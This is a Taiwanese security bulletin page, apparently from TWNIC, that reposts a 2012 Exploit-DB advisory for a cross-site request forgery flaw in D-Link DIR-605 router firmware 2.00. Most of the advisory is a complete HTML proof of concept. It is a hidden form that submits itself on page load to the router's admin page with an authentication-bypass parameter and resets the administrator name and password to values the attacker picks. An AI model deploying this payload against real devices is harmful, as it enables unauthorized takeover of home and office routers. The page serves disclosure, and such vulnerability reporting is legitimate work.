資安通報:D-Link DIR-605 CSRF Vulnerability
引用來源:http://www.exploit-db.com/exploits/18638/

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605
 
This allows unauthroized access to the device and post injections
 
<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
       <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="iqzer0" />
        <input type="hidden" name="admin_password1" value="bypass" />
        <input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>

 
 
2012年TWNIC網安教育訓練即將展開
2012年 TWNIC新一代網際網路協定教育訓練課程預告
臺灣名店大募集 500攤再臨!
4月網聚活動-網路品牌大公開
資安通報: D-Link DIR-605 CSRF Vulnerability
資安通報: Google Talk
TWNIC寬頻網路使用調查
台灣網路基礎建設概要
.tw域名統計調查
IP統計查詢
www server累計數量統計
全球IP位址與AS號碼每月統計表
每月網路大事紀